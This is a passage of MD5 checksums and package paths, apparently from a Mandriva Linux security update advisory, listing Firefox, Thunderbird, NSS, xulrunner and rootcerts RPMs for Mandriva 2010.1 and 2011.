ed3b62776cbbe4e7ff1ed7ccd8e612c2 2010.1/x86_64/firefox-es_AR-3.6.24-0.1mdv2010.2.x86_64.rpm
374699275a3061f896e18ba15786ee24 2010.1/x86_64/firefox-es_ES-3.6.24-0.1mdv2010.2.x86_64.rpm
b1af82f6376e052c2ec0a7d374ddfc04 2010.1/x86_64/firefox-et-3.6.24-0.1mdv2010.2.x86_64.rpm
186430c120425b4e8b10ab02daac5b6c 2010.1/x86_64/firefox-eu-3.6.24-0.1mdv2010.2.x86_64.rpm
dd4b49e4724076dcf9f3a2153d22d55e 2010.1/x86_64/firefox-ext-beagle-0.3.9-40.21mdv2010.2.x86_64.rpm
b67d6e28dbfc516ad3db6eb01ed9a850 2010.1/x86_64/firefox-ext-blogrovr-1.1.804-13.17mdv2010.2.x86_64.rpm
f18db390dc6e70594143423c624967b6 2010.1/x86_64/firefox-ext-mozvoikko-1.0.1-2.17mdv2010.2.x86_64.rpm
5484766a6f3c558e28206ee7df330742 2010.1/x86_64/firefox-ext-r-kiosk-0.8.1-2.17mdv2010.2.x86_64.rpm
fbc9d168acc18e5c73e928bcc4f3d293 2010.1/x86_64/firefox-ext-scribefire-3.5.2-2.17mdv2010.2.x86_64.rpm
d5c4e2471c2dba0660f049893a62c8cc 2010.1/x86_64/firefox-ext-weave-sync-1.1-5.17mdv2010.2.x86_64.rpm
f698bf43dc22da7575735d9ee27c3dc8 2010.1/x86_64/firefox-ext-xmarks-3.6.14-2.17mdv2010.2.x86_64.rpm
859b9876d73f26bcd8a233619d1bc642 2010.1/x86_64/firefox-fi-3.6.24-0.1mdv2010.2.x86_64.rpm
77b60f97624bc0c923a89cdb06a22d98 2010.1/x86_64/firefox-fr-3.6.24-0.1mdv2010.2.x86_64.rpm
985b4ea72ef18f2ced891d038ddd77a6 2010.1/x86_64/firefox-fy-3.6.24-0.1mdv2010.2.x86_64.rpm
4e1342f0806ac50f77463901ec639114 2010.1/x86_64/firefox-ga_IE-3.6.24-0.1mdv2010.2.x86_64.rpm
e69055aa1a6d74e5aecdcadacf862254 2010.1/x86_64/firefox-gl-3.6.24-0.1mdv2010.2.x86_64.rpm
1671c36dad5e408ee1bf2d6aae130a60 2010.1/x86_64/firefox-gu_IN-3.6.24-0.1mdv2010.2.x86_64.rpm
1b94039e52a0a34fff6be76f6da84371 2010.1/x86_64/firefox-he-3.6.24-0.1mdv2010.2.x86_64.rpm
0cf5a98d084ceb46c69fb62e152ba627 2010.1/x86_64/firefox-hi-3.6.24-0.1mdv2010.2.x86_64.rpm
0bfd8ccf2e334f558432cc62b23cfca9 2010.1/x86_64/firefox-hu-3.6.24-0.1mdv2010.2.x86_64.rpm
82ae6c06910a549813e56290b72ee3d4 2010.1/x86_64/firefox-id-3.6.24-0.1mdv2010.2.x86_64.rpm
ae74087d15949b7d6ca2de6c1c5314dd 2010.1/x86_64/firefox-is-3.6.24-0.1mdv2010.2.x86_64.rpm
005febaf5ed4d93f262580c27d9f1aef 2010.1/x86_64/firefox-it-3.6.24-0.1mdv2010.2.x86_64.rpm
9eecf3f6c6b3a5a4726c8bd8aee9279b 2010.1/x86_64/firefox-ja-3.6.24-0.1mdv2010.2.x86_64.rpm
6250064ae10ba13f1e9e2ae05276c6a8 2010.1/x86_64/firefox-ka-3.6.24-0.1mdv2010.2.x86_64.rpm
77776c8a72abbd5a014111598ba2b08a 2010.1/x86_64/firefox-kn-3.6.24-0.1mdv2010.2.x86_64.rpm
849a1ba3768e0a1563b600c3473dd5e0 2010.1/x86_64/firefox-ko-3.6.24-0.1mdv2010.2.x86_64.rpm
55ae6f695f4664b710cf7498dfff6ea0 2010.1/x86_64/firefox-ku-3.6.24-0.1mdv2010.2.x86_64.rpm
2de33513a958756fa3da2c40bdb24d9f 2010.1/x86_64/firefox-lt-3.6.24-0.1mdv2010.2.x86_64.rpm
8618fc48360a5b2a86e1be8daed82c91 2010.1/x86_64/firefox-lv-3.6.24-0.1mdv2010.2.x86_64.rpm
5343b767082e39c8d8d3a289e6fe93a2 2010.1/x86_64/firefox-mk-3.6.24-0.1mdv2010.2.x86_64.rpm
f14e0818f4b21678183f703d104d5b1c 2010.1/x86_64/firefox-mr-3.6.24-0.1mdv2010.2.x86_64.rpm
143f9dd564a6b30f2ae166acea97490e 2010.1/x86_64/firefox-nb_NO-3.6.24-0.1mdv2010.2.x86_64.rpm
169723c321d09a297254bc15acccfb1c 2010.1/x86_64/firefox-nl-3.6.24-0.1mdv2010.2.x86_64.rpm
f306f49860183d92ce2e87ea1e093c0f 2010.1/x86_64/firefox-nn_NO-3.6.24-0.1mdv2010.2.x86_64.rpm
8299a9747717852029ea6dcb51426f13 2010.1/x86_64/firefox-oc-3.6.24-0.1mdv2010.2.x86_64.rpm
70958d6c815bf9247bcc8e1ec5851a6b 2010.1/x86_64/firefox-pa_IN-3.6.24-0.1mdv2010.2.x86_64.rpm
222602963459a502fa9280ff1e47228d 2010.1/x86_64/firefox-pl-3.6.24-0.1mdv2010.2.x86_64.rpm
7939f11f78902ff0664d5d19cbb41277 2010.1/x86_64/firefox-pt_BR-3.6.24-0.1mdv2010.2.x86_64.rpm
d59449d1e5d1ac5839fd6a09c1f82a97 2010.1/x86_64/firefox-pt_PT-3.6.24-0.1mdv2010.2.x86_64.rpm
646718f4f71db54a688a5ebc69ae1c05 2010.1/x86_64/firefox-ro-3.6.24-0.1mdv2010.2.x86_64.rpm
27d719d72f3e0998c24c677007ba8738 2010.1/x86_64/firefox-ru-3.6.24-0.1mdv2010.2.x86_64.rpm
4e672a9921f382b152e9983f2a0d35a5 2010.1/x86_64/firefox-si-3.6.24-0.1mdv2010.2.x86_64.rpm
1acbf4276589c9e0f59958c8eb083e6b 2010.1/x86_64/firefox-sk-3.6.24-0.1mdv2010.2.x86_64.rpm
058f1bee09b709df566d57f2c658efc8 2010.1/x86_64/firefox-sl-3.6.24-0.1mdv2010.2.x86_64.rpm
4d20502533798d0a8a5ea6eaa2f9dbfe 2010.1/x86_64/firefox-sq-3.6.24-0.1mdv2010.2.x86_64.rpm
ea1e7e08d998b45cd36f6f62b9b3672b 2010.1/x86_64/firefox-sr-3.6.24-0.1mdv2010.2.x86_64.rpm
e589aa5cf501c764bce52d306b4e9a55 2010.1/x86_64/firefox-sv_SE-3.6.24-0.1mdv2010.2.x86_64.rpm
0a9eb974019941873179e6394a237e35 2010.1/x86_64/firefox-te-3.6.24-0.1mdv2010.2.x86_64.rpm
22ef4e927393e51ca4d2bc788f268ec3 2010.1/x86_64/firefox-th-3.6.24-0.1mdv2010.2.x86_64.rpm
a08ecfaffa28056217a2fc564f399ff2 2010.1/x86_64/firefox-tr-3.6.24-0.1mdv2010.2.x86_64.rpm
c0aa205f13f23947787ce3cfb61c8699 2010.1/x86_64/firefox-uk-3.6.24-0.1mdv2010.2.x86_64.rpm
9806bf2a5e0cd89dabb789aa6ec73799 2010.1/x86_64/firefox-zh_CN-3.6.24-0.1mdv2010.2.x86_64.rpm
bd27488985dfdb9a877345ffd7c484dd 2010.1/x86_64/firefox-zh_TW-3.6.24-0.1mdv2010.2.x86_64.rpm
19d38fbe12dc60362f77a8fa3e63793f 2010.1/x86_64/gjs-0.6-4.17mdv2010.2.x86_64.rpm
7ee2d38c67eb0b89c80d1116886a024e 2010.1/x86_64/gnome-python-extras-2.25.3-18.17mdv2010.2.x86_64.rpm
0d3ee94f2b5a6d1e90ef6a8d01fccaed 2010.1/x86_64/gnome-python-gda-2.25.3-18.17mdv2010.2.x86_64.rpm
32f615d0564906fae88ab3bb7c59c70a 2010.1/x86_64/gnome-python-gda-devel-2.25.3-18.17mdv2010.2.x86_64.rpm
4b02696612d1fad9349331eef93aba6a 2010.1/x86_64/gnome-python-gdl-2.25.3-18.17mdv2010.2.x86_64.rpm
5d6c99978a7facdb6fdb195a38f06603 2010.1/x86_64/gnome-python-gtkhtml2-2.25.3-18.17mdv2010.2.x86_64.rpm
542a6536442737c77aadb80ef2fc4c13 2010.1/x86_64/gnome-python-gtkmozembed-2.25.3-18.17mdv2010.2.x86_64.rpm
c0da514849600a3f37dee768b3a0cbd9 2010.1/x86_64/gnome-python-gtkspell-2.25.3-18.17mdv2010.2.x86_64.rpm
baa2e47c65e747dc18c70442e04143de 2010.1/x86_64/lib64gjs0-0.6-4.17mdv2010.2.x86_64.rpm
8d97367f980b5062e06237821abdfee3 2010.1/x86_64/lib64gjs-devel-0.6-4.17mdv2010.2.x86_64.rpm
47f592aab76acb991627142632ee92ba 2010.1/x86_64/lib64nss3-3.13.1-0.1mdv2010.2.x86_64.rpm
a421dd6355c88a67ca5935f27b1a4310 2010.1/x86_64/lib64nss-devel-3.13.1-0.1mdv2010.2.x86_64.rpm
df2038a8da9b18e208eb2183fdb77576 2010.1/x86_64/lib64nss-static-devel-3.13.1-0.1mdv2010.2.x86_64.rpm
95d12f7d0b2facdee66cc4532f4064d2 2010.1/x86_64/lib64xulrunner1.9.2.24-1.9.2.24-0.1mdv2010.2.x86_64.rpm
d752ff3da8e9755bc87b74aab437458c 2010.1/x86_64/lib64xulrunner-devel-1.9.2.24-0.1mdv2010.2.x86_64.rpm
6be2946ec93a54fe8462493bb045e85c 2010.1/x86_64/mozilla-thunderbird-3.1.16-0.1mdv2010.2.x86_64.rpm
8d899c50d772dd6bfd97bfe81aa6fb84 2010.1/x86_64/mozilla-thunderbird-af-3.1.16-0.1mdv2010.2.noarch.rpm
6e66711c958f6f9f138e890d9649e38a 2010.1/x86_64/mozilla-thunderbird-ar-3.1.16-0.1mdv2010.2.noarch.rpm
950f09e903118195128e981b110b4e8c 2010.1/x86_64/mozilla-thunderbird-be-3.1.16-0.1mdv2010.2.noarch.rpm
055326013055fb943dd8a97f3817dbac 2010.1/x86_64/mozilla-thunderbird-beagle-0.3.9-40.21mdv2010.2.x86_64.rpm
df33d01fa85ad96015ed0ba64bba3aea 2010.1/x86_64/mozilla-thunderbird-bg-3.1.16-0.1mdv2010.2.noarch.rpm
597f454ed2bc614f058e69017e8c2eb2 2010.1/x86_64/mozilla-thunderbird-bn_BD-3.1.16-0.1mdv2010.2.noarch.rpm
03e98fba3957f92bde9cbb159b27663c 2010.1/x86_64/mozilla-thunderbird-ca-3.1.16-0.1mdv2010.2.noarch.rpm
566387536e035f8c5433ad09dd71f17c 2010.1/x86_64/mozilla-thunderbird-cs-3.1.16-0.1mdv2010.2.noarch.rpm
fed2aba26d023ceeb05b0ce4bb3a1bf7 2010.1/x86_64/mozilla-thunderbird-da-3.1.16-0.1mdv2010.2.noarch.rpm
e471f2e511e314898024d869312f34e6 2010.1/x86_64/mozilla-thunderbird-de-3.1.16-0.1mdv2010.2.noarch.rpm
5dd6970184123c65293a76dbdc58ecde 2010.1/x86_64/mozilla-thunderbird-el-3.1.16-0.1mdv2010.2.noarch.rpm
922ba800f8352242ff7de83036160ea1 2010.1/x86_64/mozilla-thunderbird-en_GB-3.1.16-0.1mdv2010.2.noarch.rpm
14d7ec0a8ead78e03f88dfc9586ee1c2 2010.1/x86_64/mozilla-thunderbird-enigmail-3.1.16-0.1mdv2010.2.x86_64.rpm
911a01dd29ea49f35077600966b5c6a4 2010.1/x86_64/mozilla-thunderbird-enigmail-ar-3.1.16-0.1mdv2010.2.noarch.rpm
8b818734939c391b373ff87e04aa3061 2010.1/x86_64/mozilla-thunderbird-enigmail-ca-3.1.16-0.1mdv2010.2.noarch.rpm
f49f4e53960d06fe045b6a7ea651e5f0 2010.1/x86_64/mozilla-thunderbird-enigmail-cs-3.1.16-0.1mdv2010.2.noarch.rpm
8c79450f12572a87960d19833b5740cb 2010.1/x86_64/mozilla-thunderbird-enigmail-de-3.1.16-0.1mdv2010.2.noarch.rpm
d0b51f341b8907417f84f7f05624ee34 2010.1/x86_64/mozilla-thunderbird-enigmail-el-3.1.16-0.1mdv2010.2.noarch.rpm
6b64b50b7cbe6b5ac07f405774061832 2010.1/x86_64/mozilla-thunderbird-enigmail-es-3.1.16-0.1mdv2010.2.noarch.rpm
36d7225a19094212258c99a33108a670 2010.1/x86_64/mozilla-thunderbird-enigmail-fi-3.1.16-0.1mdv2010.2.noarch.rpm
978acb5a069c4480a37530614a89b632 2010.1/x86_64/mozilla-thunderbird-enigmail-fr-3.1.16-0.1mdv2010.2.noarch.rpm
e6fdc37e774d697e840bc4c6572a0e7c 2010.1/x86_64/mozilla-thunderbird-enigmail-hu-3.1.16-0.1mdv2010.2.noarch.rpm
5bcaaf0d940ea86288557827c769e35d 2010.1/x86_64/mozilla-thunderbird-enigmail-it-3.1.16-0.1mdv2010.2.noarch.rpm
93a222e7198bdbe6f8d521397200d31a 2010.1/x86_64/mozilla-thunderbird-enigmail-ja-3.1.16-0.1mdv2010.2.noarch.rpm
9bd1ffa12f0f7b1e207e9fbb37fe8649 2010.1/x86_64/mozilla-thunderbird-enigmail-ko-3.1.16-0.1mdv2010.2.noarch.rpm
9c9c972c109c88bc1fe9a4b19ebfd687 2010.1/x86_64/mozilla-thunderbird-enigmail-nb-3.1.16-0.1mdv2010.2.noarch.rpm
786d44e6d903667a0307c68895089935 2010.1/x86_64/mozilla-thunderbird-enigmail-nl-3.1.16-0.1mdv2010.2.noarch.rpm
7500d4d23067895de403aadcce4f76db 2010.1/x86_64/mozilla-thunderbird-enigmail-pl-3.1.16-0.1mdv2010.2.noarch.rpm
471bbb9f9dd7d513f1ef2399d71a0c9a 2010.1/x86_64/mozilla-thunderbird-enigmail-pt-3.1.16-0.1mdv2010.2.noarch.rpm
7608a6ad847656a444aabc6f9c88adab 2010.1/x86_64/mozilla-thunderbird-enigmail-pt_BR-3.1.16-0.1mdv2010.2.noarch.rpm
b27cac01c93a5696a8eec41695aa83f2 2010.1/x86_64/mozilla-thunderbird-enigmail-ru-3.1.16-0.1mdv2010.2.noarch.rpm
0fd4c42eec0ebbd3d10b6e5f1f32933e 2010.1/x86_64/mozilla-thunderbird-enigmail-sl-3.1.16-0.1mdv2010.2.noarch.rpm
b713f268034da86b9fe5b2a70a08c831 2010.1/x86_64/mozilla-thunderbird-enigmail-sv-3.1.16-0.1mdv2010.2.noarch.rpm
c84d1329642b2700942d7da6dd5ae77a 2010.1/x86_64/mozilla-thunderbird-enigmail-tr-3.1.16-0.1mdv2010.2.noarch.rpm
405eeb15c4c6134dede4d19eaa1fde21 2010.1/x86_64/mozilla-thunderbird-enigmail-vi-3.1.16-0.1mdv2010.2.noarch.rpm
50d85795c785345bdc9031657d27df0b 2010.1/x86_64/mozilla-thunderbird-enigmail-zh_CN-3.1.16-0.1mdv2010.2.noarch.rpm
908e119929a8ccd8fb8dfd7c14887a98 2010.1/x86_64/mozilla-thunderbird-enigmail-zh_TW-3.1.16-0.1mdv2010.2.noarch.rpm
3f42f7c59bb4834fdeb4774bb63b3d18 2010.1/x86_64/mozilla-thunderbird-es_AR-3.1.16-0.1mdv2010.2.noarch.rpm
d4672765558a44936279f33a1081ac06 2010.1/x86_64/mozilla-thunderbird-es_ES-3.1.16-0.1mdv2010.2.noarch.rpm
311b373bf3ccefa76c19518ba3f0136c 2010.1/x86_64/mozilla-thunderbird-et-3.1.16-0.1mdv2010.2.noarch.rpm
010e275b7847371385a59263a503c847 2010.1/x86_64/mozilla-thunderbird-et_EE-3.1.16-0.1mdv2010.2.noarch.rpm
b63621698e1bc0b9479218f1d476786e 2010.1/x86_64/mozilla-thunderbird-eu-3.1.16-0.1mdv2010.2.noarch.rpm
4d04b0bb5ad32b16f82493d46a6b3031 2010.1/x86_64/mozilla-thunderbird-fi-3.1.16-0.1mdv2010.2.noarch.rpm
d70ff5164ddf3ba0a7cd30a91114733f 2010.1/x86_64/mozilla-thunderbird-fr-3.1.16-0.1mdv2010.2.noarch.rpm
e6ceebcec9eae1adf4fc5a5675209050 2010.1/x86_64/mozilla-thunderbird-fy-3.1.16-0.1mdv2010.2.noarch.rpm
353dbf7745add4b07c6966a56b0ea694 2010.1/x86_64/mozilla-thunderbird-ga-3.1.16-0.1mdv2010.2.noarch.rpm
bbe9e48b59ccf8d13bc11068a698f272 2010.1/x86_64/mozilla-thunderbird-gd-3.1.16-0.1mdv2010.2.noarch.rpm
d389393c1ccbc700670832bbd1b5ce56 2010.1/x86_64/mozilla-thunderbird-gl-3.1.16-0.1mdv2010.2.noarch.rpm
030e3f706726fd90713f88b0c86c698d 2010.1/x86_64/mozilla-thunderbird-he-3.1.16-0.1mdv2010.2.noarch.rpm
543481fac6524be4c839ecf2240c5663 2010.1/x86_64/mozilla-thunderbird-hu-3.1.16-0.1mdv2010.2.noarch.rpm
8a81b4099bfa8efb1b1a4c25fcead6ae 2010.1/x86_64/mozilla-thunderbird-id-3.1.16-0.1mdv2010.2.noarch.rpm
4802e2c3fcc4fa94e14f105d0f0cec73 2010.1/x86_64/mozilla-thunderbird-is-3.1.16-0.1mdv2010.2.noarch.rpm
28980c24258b331f07d74c47c5358a3e 2010.1/x86_64/mozilla-thunderbird-it-3.1.16-0.1mdv2010.2.noarch.rpm
df92b8329a767784256f0aae7eeaf79c 2010.1/x86_64/mozilla-thunderbird-ja-3.1.16-0.1mdv2010.2.noarch.rpm
e07b70c902524b759ceebf303666d12d 2010.1/x86_64/mozilla-thunderbird-ka-3.1.16-0.1mdv2010.2.noarch.rpm
208219f763f6c63e6ec472c43ffb0b4c 2010.1/x86_64/mozilla-thunderbird-ko-3.1.16-0.1mdv2010.2.noarch.rpm
d762d9880070afbeb6765adba64a528c 2010.1/x86_64/mozilla-thunderbird-lightning-3.1.16-0.1mdv2010.2.x86_64.rpm
8bc86b3f3edccd22533776bc1f69f92f 2010.1/x86_64/mozilla-thunderbird-lt-3.1.16-0.1mdv2010.2.noarch.rpm
8f3a95504e3e5fa1d48ec5ff4891dbb4 2010.1/x86_64/mozilla-thunderbird-nb_NO-3.1.16-0.1mdv2010.2.noarch.rpm
cd7ee6a11d6871ededcc6ed045fc8415 2010.1/x86_64/mozilla-thunderbird-nl-3.1.16-0.1mdv2010.2.noarch.rpm
050cdbae1a388359759da72001a2dc8f 2010.1/x86_64/mozilla-thunderbird-nn_NO-3.1.16-0.1mdv2010.2.noarch.rpm
90c9b8bcc0270ccb40e467cb1f438d47 2010.1/x86_64/mozilla-thunderbird-pa_IN-3.1.16-0.1mdv2010.2.noarch.rpm
07bec90b6813b673be5dccf9c5d6d6d5 2010.1/x86_64/mozilla-thunderbird-pl-3.1.16-0.1mdv2010.2.noarch.rpm
d508af40ad7fbcbf2639dcb69fc695f9 2010.1/x86_64/mozilla-thunderbird-pt_BR-3.1.16-0.1mdv2010.2.noarch.rpm
a541026ddce8df4ddd6b9514ee41f7f7 2010.1/x86_64/mozilla-thunderbird-pt_PT-3.1.16-0.1mdv2010.2.noarch.rpm
e91be8a9d9c166be947663e31c3158e3 2010.1/x86_64/mozilla-thunderbird-ro-3.1.16-0.1mdv2010.2.noarch.rpm
eeea7ae9f2ee27a8efb13b16e4dacbeb 2010.1/x86_64/mozilla-thunderbird-ru-3.1.16-0.1mdv2010.2.noarch.rpm
64a5e55e9f0e6688291028440e7cd322 2010.1/x86_64/mozilla-thunderbird-si-3.1.16-0.1mdv2010.2.noarch.rpm
c0599acfb7bcd633a218ec9776213e0e 2010.1/x86_64/mozilla-thunderbird-sk-3.1.16-0.1mdv2010.2.noarch.rpm
843aa3c6e80a19539dc900b062bbde9b 2010.1/x86_64/mozilla-thunderbird-sl-3.1.16-0.1mdv2010.2.noarch.rpm
db56425a11a8fe300d1d8a9bedf4939b 2010.1/x86_64/mozilla-thunderbird-sq-3.1.16-0.1mdv2010.2.noarch.rpm
cd89eb4acd72c55851e6b5c6708ab7ca 2010.1/x86_64/mozilla-thunderbird-sr-3.1.16-0.1mdv2010.2.noarch.rpm
1c8ac9d125557ffb59a4633f5bdece8a 2010.1/x86_64/mozilla-thunderbird-sv_SE-3.1.16-0.1mdv2010.2.noarch.rpm
3fe0be7c1ada36b07fe5ac856284d8cb 2010.1/x86_64/mozilla-thunderbird-tr-3.1.16-0.1mdv2010.2.noarch.rpm
f8bc99dc6e88ab3d13984f14cc4e8de8 2010.1/x86_64/mozilla-thunderbird-uk-3.1.16-0.1mdv2010.2.noarch.rpm
7fa3b3aab2b35a96ed79b73914954ab3 2010.1/x86_64/mozilla-thunderbird-vi-3.1.16-0.1mdv2010.2.noarch.rpm
39bec092213725d71574d4f7fd7674da 2010.1/x86_64/mozilla-thunderbird-zh_CN-3.1.16-0.1mdv2010.2.noarch.rpm
55bd4c283d7d4f756b257d705aae39cf 2010.1/x86_64/mozilla-thunderbird-zh_TW-3.1.16-0.1mdv2010.2.noarch.rpm
eabdc5b1561e876528f0b83b1b9db049 2010.1/x86_64/nsinstall-3.1.16-0.1mdv2010.2.x86_64.rpm
574c41d8978146f883fddaafc74bac84 2010.1/x86_64/nss-3.13.1-0.1mdv2010.2.x86_64.rpm
a7f456606790fd7424f15f475b00945c 2010.1/x86_64/rootcerts-20111103.00-1mdv2010.2.x86_64.rpm
3d6aee3e7b7e7b073ed6cd027ea0a548 2010.1/x86_64/rootcerts-java-20111103.00-1mdv2010.2.x86_64.rpm
bf81d9a06f6ac3a6e8dec2c3302d2a87 2010.1/x86_64/xulrunner-1.9.2.24-0.1mdv2010.2.x86_64.rpm
8fe580730bcb52e2dddae9829cc64b43 2010.1/x86_64/yelp-2.30.1-4.17mdv2010.2.x86_64.rpm
d3174b3f369b61a608e05fefea606d65 2010.1/SRPMS/beagle-0.3.9-40.21mdv2010.2.src.rpm
f2d0b9b2bec01707a8ff4b203e967872 2010.1/SRPMS/firefox-3.6.24-0.1mdv2010.2.src.rpm
8ee066eb05d1c6260fc0dd0546edac45 2010.1/SRPMS/firefox-ext-blogrovr-1.1.804-13.17mdv2010.2.src.rpm
de634a8f79d89a8b0002f620594f12ef 2010.1/SRPMS/firefox-ext-mozvoikko-1.0.1-2.17mdv2010.2.src.rpm
0079a81800becc30b43020042b517ecc 2010.1/SRPMS/firefox-ext-r-kiosk-0.8.1-2.17mdv2010.2.src.rpm
40eee07899a7670d3c95dc49a219c273 2010.1/SRPMS/firefox-ext-scribefire-3.5.2-2.17mdv2010.2.src.rpm
eabb56231c3a73813bba9e3c9e8f2f9c 2010.1/SRPMS/firefox-ext-weave-sync-1.1-5.17mdv2010.2.src.rpm
e2763c105c42f815d696ae4d944393b7 2010.1/SRPMS/firefox-ext-xmarks-3.6.14-2.17mdv2010.2.src.rpm
df56bf25f4a3a520499d1baa2dcb07ae 2010.1/SRPMS/firefox-l10n-3.6.24-0.1mdv2010.2.src.rpm
7ddf058d3e02488468a1502795562fb0 2010.1/SRPMS/gjs-0.6-4.17mdv2010.2.src.rpm
a2fa7ea38d7ed5b9c0ba837217b87e22 2010.1/SRPMS/gnome-python-extras-2.25.3-18.17mdv2010.2.src.rpm
587405665ced72877e71cffef3a858ff 2010.1/SRPMS/mozilla-thunderbird-3.1.16-0.1mdv2010.2.src.rpm
e5eda91084de3858c43751bd26968ceb 2010.1/SRPMS/mozilla-thunderbird-l10n-3.1.16-0.1mdv2010.2.src.rpm
c80fab55df58911b4f383408fb65311f 2010.1/SRPMS/nss-3.13.1-0.1mdv2010.2.src.rpm
9b3ae0a7187d61e5a60b0dcfe2284dfe 2010.1/SRPMS/rootcerts-20111103.00-1mdv2010.2.src.rpm
c8b86417f2d11df280cb5ee8538e17a0 2010.1/SRPMS/xulrunner-1.9.2.24-0.1mdv2010.2.src.rpm
fa9a1bff3f57121ed598449d58fc7941 2010.1/SRPMS/yelp-2.30.1-4.17mdv2010.2.src.rpm
Mandriva Linux 2011:
b5673d2b9221788ec237d56d1c5d8277 2011/i586/firefox-8.0-0.1-mdv2011.0.i586.rpm
89929d23ddcb70ed0a2d5fd95290cfcd 2011/i586/firefox-af-8.0-0.1-mdv2011.0.noarch.rpm
74efc49d6468d66951e7ca484f4c5081 2011/i586/firefox-ar-8.0-0.1-mdv2011.0.noarch.rpm
3a4c638b87116175c60f77d68f9cfec7 2011/i586/firefox-ast-8.0-0.1-mdv2011.0.noarch.rpm
3f51eef7223b41cab76146577b2caadd 2011/i586/firefox-be-8.0-0.1-mdv2011.0.noarch.rpm
d3ae9b726c1b88dfcad863ef0df5e003 2011/i586/firefox-bg-8.0-0.1-mdv2011.0.noarch.rpm
b999d432be8beeec390f1a19760d7e7d 2011/i586/firefox-bn-8.0-0.1-mdv2011.0.noarch.rpm
48fbb2610d101e1d724a09fd6d61ccc1 2011/i586/firefox-br-8.0-0.1-mdv2011.0.noarch.rpm
af8c15477f98544f7abeb164d085549d 2011/i586/firefox-bs-8.0-0.1-mdv2011.0.noarch.rpm
729efae4ab3ff6e6048452d105cf354e 2011/i586/firefox-ca-8.0-0.1-mdv2011.0.noarch.rpm
76a19c4a8838f259c768e93f185a87ba 2011/i586/firefox-cs-8.0-0.1-mdv2011.0.noarch.rpm
474bf24de0d6cda81eb58f4f7ca95369 2011/i586/firefox-cy-8.0-0.1-mdv2011.0.noarch.rpm
f16a3e06994ce22bfca0825c59ad0e41 2011/i586/firefox-da-8.0-0.1-mdv2011.0.noarch.rpm
b2697f696e884e392cb6dd80a4351df6 2011/i586/firefox-de-8.0-0.1-mdv2011.0.noarch.rpm
1ddd5e6bd65e6d73ace9e318ea2b769e 2011/i586/firefox-devel-8.0-0.1-mdv2011.0.i586.rpm
43c71bce8b1064764a488f015543180e 2011/i586/firefox-el-8.0-0.1-mdv2011.0.noarch.rpm
0bbe78aec9e82ef67d60b58080564730 2011/i586/firefox-en_GB-8.0-0.1-mdv2011.0.noarch.rpm
5cbc247228b0f9382714b1f9cfd76fd2 2011/i586/firefox-eo-8.0-0.1-mdv2011.0.noarch.rpm
a48d9028fd028f473ba9a2f3d1006984 2011/i586/firefox-es_AR-8.0-0.1-mdv2011.0.noarch.rpm
fb8f16d45eac9e0fe0fd691c85f27582 2011/i586/firefox-es_ES-8.0-0.1-mdv2011.0.noarch.rpm
52ad646a16ddebe714979f7764eaa800 2011/i586/firefox-et-8.0-0.1-mdv2011.0.noarch.rpm
a69fc5bb4e060619bc0388debd6a6199 2011/i586/firefox-eu-8.0-0.1-mdv2011.0.noarch.rpm
e811ab11de6a443a518432ba53a527b8 2011/i586/firefox-fa-8.0-0.1-mdv2011.0.noarch.rpm
b69f19454696c50364e575641001e2d6 2011/i586/firefox-fi-8.0-0.1-mdv2011.0.noarch.rpm
afb95e00ea59eead16702c0b92460cae 2011/i586/firefox-fr-8.0-0.1-mdv2011.0.noarch.rpm
c067833a7c370dffabcc2fc1124a5df1 2011/i586/firefox-fy-8.0-0.1-mdv2011.0.noarch.rpm
ccef7b0520a475888a74011df0697a43 2011/i586/firefox-ga_IE-8.0-0.1-mdv2011.0.noarch.rpm
eb5d7a949bd2e52e8662e20e0dcc6efb 2011/i586/firefox-gd-8.0-0.1-mdv2011.0.noarch.rpm
e2ae4790a5474f7f3d1a53beb43a5661 2011/i586/firefox-gl-8.0-0.1-mdv2011.0.noarch.rpm
7af61544f27278679fcacbe2f5a6b6f7 2011/i586/firefox-gu_IN-8.0-0.1-mdv2011.0.noarch.rpm
9bec651797a00e1a5a5bdd1d315a91eb 2011/i586/firefox-he-8.0-0.1-mdv2011.0.noarch.rpm
88344df2d06f88cfd6ea84c9c4c32505 2011/i586/firefox-hi-8.0-0.1-mdv2011.0.noarch.rpm
d1e0791cd602f194e608cbef8d01afbe 2011/i586/firefox-hr-8.0-0.1-mdv2011.0.noarch.rpm
a01a259524a4eee139e5807606d3a4f5 2011/i586/firefox-hu-8.0-0.1-mdv2011.0.noarch.rpm
c19c1bf0bf5e8d567f924fae2077ee89 2011/i586/firefox-hy-8.0-0.1-mdv2011.0.noarch.rpm
d223139e43803112998d42b991a776a6 2011/i586/firefox-id-8.0-0.1-mdv2011.0.noarch.rpm
892391de32c79b68c8bd774da1242606 2011/i586/firefox-is-8.0-0.1-mdv2011.0.noarch.rpm
c92cd6a2b63b0571b4fe652d422bd3d4 2011/i586/firefox-it-8.0-0.1-mdv2011.0.noarch.rpm
dbc7eeab97b2a24ab53e6634c33d2e31 2011/i586/firefox-ja-8.0-0.1-mdv2011.0.noarch.rpm
4deffae21209c479e0ff17465e6bac9e 2011/i586/firefox-kk-8.0-0.1-mdv2011.0.noarch.rpm
ceef96d7f40afb9c8e9a6b866b38c9c5 2011/i586/firefox-kn-8.0-0.1-mdv2011.0.noarch.rpm
e135886443c1ae3713516eba7cfc5978 2011/i586/firefox-ko-8.0-0.1-mdv2011.0.noarch.rpm
58a77d982ca9b483fc166fae49f97562 2011/i586/firefox-ku-8.0-0.1-mdv2011.0.noarch.rpm
d14f2a82d47d1b468ed53aba55a2eb47 2011/i586/firefox-lg-8.0-0.1-mdv2011.0.noarch.rpm
42578a86d6aab41986fbc4cea03985e4 2011/i586/firefox-lt-8.0-0.1-mdv2011.0.noarch.rpm
799f548f4005617d2be53295862886d5 2011/i586/firefox-lv-8.0-0.1-mdv2011.0.noarch.rpm
ab71a11922c736b4ac9181026b170d7b 2011/i586/firefox-mai-8.0-0.1-mdv2011.0.noarch.rpm
7ba9c89785574ea15bcc5b707d2658ed 2011/i586/firefox-mk-8.0-0.1-mdv2011.0.noarch.rpm
e92637c23f7ca4268b42ad38bc140852 2011/i586/firefox-ml-8.0-0.1-mdv2011.0.noarch.rpm
169af340a6212d2731bedcc8ce29b488 2011/i586/firefox-mr-8.0-0.1-mdv2011.0.noarch.rpm
fa968c0de0213248574ed7111709d95d 2011/i586/firefox-nb_NO-8.0-0.1-mdv2011.0.noarch.rpm
b06ccc954674b56b648124f981435b2a 2011/i586/firefox-nl-8.0-0.1-mdv2011.0.noarch.rpm
f3f47226139973e585934ca3dbffff0c 2011/i586/firefox-nn_NO-8.0-0.1-mdv2011.0.noarch.rpm
